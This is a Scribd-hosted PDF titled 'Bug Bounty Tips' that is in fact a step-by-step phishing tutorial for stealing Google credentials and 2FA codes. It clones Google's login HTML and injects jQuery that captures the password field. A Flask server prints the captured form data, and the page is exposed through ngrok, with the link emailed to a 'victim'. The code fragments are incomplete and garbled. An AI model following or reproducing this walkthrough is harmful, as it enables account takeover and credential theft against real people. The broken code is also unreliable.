0% found this document useful (0 votes)
9 views9 pages

Bug Bounty Tips

This document describes how to bypass two-factor authentication (2FA) using a phishing attack. It involves creating fake Google and 2FA login pages to steal login credentials from a victim. The attacker configures a Python web server and ngrok to receive the stolen credentials.

Uploaded by

mauropsanmartin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
9 views9 pages

Bug Bounty Tips

This document describes how to bypass two-factor authentication (2FA) using a phishing attack. It involves creating fake Google and 2FA login pages to steal login credentials from a victim. The attacker configures a Python web server and ngrok to receive the stolen credentials.

Uploaded by

mauropsanmartin
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

1

HOW TO BYPASS THE


2FA(TWO FACTOR
AUTHENTICATION)
By:Canonminibeast

Note: This document is not created by a professional content writer so any mistake and
error is a part of great design

Social media:@viehgroup vww.viehgroup.com [email protected]


2

Disclaimer

This document is generated by VIEH Group and if there is any contribution or or

credit, it’s mentioned on the first page. The information provided herein is for

educational purposes only and does not constitute legal or professional advice. While

we have made every effort to ensure the accuracy and reliability of the information

presented, VIEH Group disclaims any warranties or representations, express or

implied, regarding the completeness, accuracy, or usefulness of this document. Any

reliance you place on the information contained in this document is strictly at your

own risk. VIEH Group shall not be liable for any damages arising from the use of or

reliance on this document. also we highly appreciate the source person for this

document.

Happy reading !

Content Credit: Canonminibeast

Social media:@viehgroup vww.viehgroup.com [email protected]


3

Initially we should know about some basics of phishing attack, It is the

base technique we use here to gain password of victim

REQUIREMENTS

STEP 1:

Initially use your browser and search for google sign in

Social media:@viehgroup vww.viehgroup.com [email protected]


4

STEP 2:

Type the mail id you wanna hack, after entering the mail id and click

next

Social media:@viehgroup vww.viehgroup.com [email protected]


5

STEP 3:

After entering the mail id and right click the mouse and click inspect

STEP 4:

after clicking inspect element ,go to inspector tab or element tab and

right click and click the option called EDIT AS HTML,copy all html codes.

Social media:@viehgroup vww.viehgroup.com [email protected]


6

STEP 5:

paste it on sublime text editor and add some script at the end of the

html tag

ill drop the code here

$(‘button’).click(function(e){

auth=$(‘input[type=password]’).val()

“http://localhost:5000/auth",

window.location=”http://localhost:5000/login"

save this file as login.html

Social media:@viehgroup vww.viehgroup.com [email protected]


7

NOTE:

do it same for 2 factor authentication page

STEP 6:

next we need to write a python code that fetch deets from victim. And

save it as app.py

from flask import Flask, render_template, send_file, make_response,

request

@app.route(“/auth”, methods=[“POST”])

print(request.form.to_dict())

response = make_response(send_file(“templates/login.html”))

response.headers.add(“Access-Control-Allow-Origin”, “*”)

return send_file(“templates/2fa.html”)

if __name__ == “__main__”:

Social media:@viehgroup vww.viehgroup.com [email protected]


8

STEP 7:

open terminal in linux and type as i did and configure the ngrok

ngrok command

And send the link in mail to victim, BOOM…….!!!! you’ve got a

password

Originally published at https://readitgainit.blogspot.com on July 21,

2023.

Social media:@viehgroup vww.viehgroup.com [email protected]


9

Thanks for reading

Social media:@viehgroup vww.viehgroup.com [email protected]

You might also like